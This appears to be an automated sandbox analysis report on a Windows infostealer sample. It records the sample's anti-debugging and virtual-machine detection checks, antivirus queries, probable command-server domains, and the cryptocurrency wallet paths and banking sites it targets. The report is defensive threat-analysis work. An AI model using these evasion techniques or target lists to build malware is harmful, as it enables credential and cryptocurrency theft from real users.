                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F604D8 second address: 4F60552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov dl, 37h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov ah, 1Dh 0x0000000e pushfd 0x0000000f jmp 00007F4EF0C09E27h 0x00000014 and eax, 0065D23Eh 0x0000001a jmp 00007F4EF0C09E29h 0x0000001f popfd 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F4EF0C09E1Eh 0x00000027 push eax 0x00000028 jmp 00007F4EF0C09E1Bh 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4EF0C09E25h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60552 second address: 4F60562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60562 second address: 4F60571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60571 second address: 4F605A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79890h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4EF0C79897h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F605EC second address: 4F605F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F605F0 second address: 4F50EAC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4EF0C7988Ah 0x00000008 adc ecx, 352F1A48h 0x0000000e jmp 00007F4EF0C7988Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov cx, 5DBFh 0x0000001a popad 0x0000001b je 00007F4F617778C5h 0x00000021 xor eax, eax 0x00000023 jmp 00007F4EF0C52FBAh 0x00000028 pop esi 0x00000029 pop edi 0x0000002a pop ebx 0x0000002b leave 0x0000002c retn 0004h 0x0000002f nop 0x00000030 xor ebx, ebx 0x00000032 cmp eax, 00000000h 0x00000035 je 00007F4EF0C799E3h 0x0000003b call 00007F4EF58F7BABh 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 mov cx, di 0x00000046 popad 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov ebx, ecx 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50EAC second address: 4F50EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50EB2 second address: 4F50EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50EB6 second address: 4F50EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4EF0C09E1Ah 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F4EF0C09E20h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bl, 23h 0x0000001b call 00007F4EF0C09E26h 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50EF9 second address: 4F50F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C79897h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50F14 second address: 4F50F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov dl, B8h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50F3D second address: 4F50F99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0388B302h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F4EF0C79892h 0x00000012 pushfd 0x00000013 jmp 00007F4EF0C79892h 0x00000018 xor ax, 51C8h 0x0000001d jmp 00007F4EF0C7988Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ecx 0x00000025 pushad 0x00000026 mov esi, 0270DC5Bh 0x0000002b push ecx 0x0000002c pushad 0x0000002d popad 0x0000002e pop edx 0x0000002f popad 0x00000030 mov dword ptr [ebp-04h], 55534552h 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a mov edx, esi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60B1F second address: 4F60B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AB459Ch], 05h 0x00000010 jmp 00007F4EF0C09E1Eh 0x00000015 je 00007F4F616F7CC4h 0x0000001b jmp 00007F4EF0C09E20h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60B6E second address: 4F60B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F60B72 second address: 4F60B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F7091F second address: 4F70923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70923 second address: 4F70927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70927 second address: 4F7092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F7092D second address: 4F70933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70933 second address: 4F70937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70937 second address: 4F70996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4EF0C09E1Fh 0x00000012 or esi, 6534C12Eh 0x00000018 jmp 00007F4EF0C09E29h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F4EF0C09E20h 0x00000024 sbb ax, E6A8h 0x00000029 jmp 00007F4EF0C09E1Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70996 second address: 4F709AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C79894h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F709AE second address: 4F709B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F709B2 second address: 4F70A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4EF0C7988Ch 0x00000010 adc esi, 57549438h 0x00000016 jmp 00007F4EF0C7988Bh 0x0000001b popfd 0x0000001c mov esi, 4511FA6Fh 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007F4EF0C79892h 0x00000028 mov esi, dword ptr [ebp+0Ch] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F4EF0C7988Eh 0x00000032 or si, CDC8h 0x00000037 jmp 00007F4EF0C7988Bh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F4EF0C79898h 0x00000043 and al, 00000028h 0x00000046 jmp 00007F4EF0C7988Bh 0x0000004b popfd 0x0000004c popad 0x0000004d test esi, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 call 00007F4EF0C7988Bh 0x00000057 pop esi 0x00000058 pushfd 0x00000059 jmp 00007F4EF0C79899h 0x0000005e sub ax, 76F6h 0x00000063 jmp 00007F4EF0C79891h 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70A84 second address: 4F70AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4F616E7734h 0x0000000f pushad 0x00000010 mov dl, cl 0x00000012 call 00007F4EF0C09E29h 0x00000017 pop edi 0x00000018 popad 0x00000019 cmp dword ptr [75AB459Ch], 05h 0x00000020 jmp 00007F4EF0C09E1Ah 0x00000025 je 00007F4F616FF7DFh 0x0000002b jmp 00007F4EF0C09E20h 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push ebx 0x00000035 pop eax 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70AEB second address: 4F70B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79895h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov cl, FBh 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4EF0C7988Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70C0E second address: 4F70C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ecx 0x0000000f pushfd 0x00000010 jmp 00007F4EF0C09E1Fh 0x00000015 and cx, 87FEh 0x0000001a jmp 00007F4EF0C09E29h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSpecial instruction interceptor: First address: 2F7C39 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSpecial instruction interceptor: First address: 4A2B27 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSpecial instruction interceptor: First address: 52ACEE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe TID: 7388Thread sleep time: -38019s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe TID: 7812Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe TID: 7364Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeLast function: Thread delayed
                Source: Amcache.hve.11.drBinary or memory string: VMware
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.00000000011D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482668636.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405967679.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001215000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.11.drBinary or memory string: vmci.sys
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.11.drBinary or memory string: VMware20,1
                Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: FBmz85HS0d.exe, 00000000.00000002.1873743187.0000000000482000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005949000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000002.1873743187.0000000000482000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: SICE
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: FBmz85HS0d.exe, 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: steppriflej.xyz
                Source: FBmz85HS0d.exe, 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sendypaster.xyz
                Source: FBmz85HS0d.exe, 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: cuddlyready.xyz
                Source: FBmz85HS0d.exe, 00000000.00000002.1873912279.00000000004C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: @XProgram Manager
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: FBmz85HS0d.exe, FBmz85HS0d.exe, 00000000.00000003.1427588716.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: FBmz85HS0d.exe PID: 7312, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: FBmz85HS0d.exeString found in binary or memory: Wallets/Electrum
                Source: FBmz85HS0d.exeString found in binary or memory: Wallets/ElectronCash
                Source: FBmz85HS0d.exeString found in binary or memory: window-state.json
                Source: FBmz85HS0d.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: FBmz85HS0d.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: FBmz85HS0d.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: FBmz85HS0d.exeString found in binary or memory: %appdata%\Ethereum
                Source: FBmz85HS0d.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: FBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
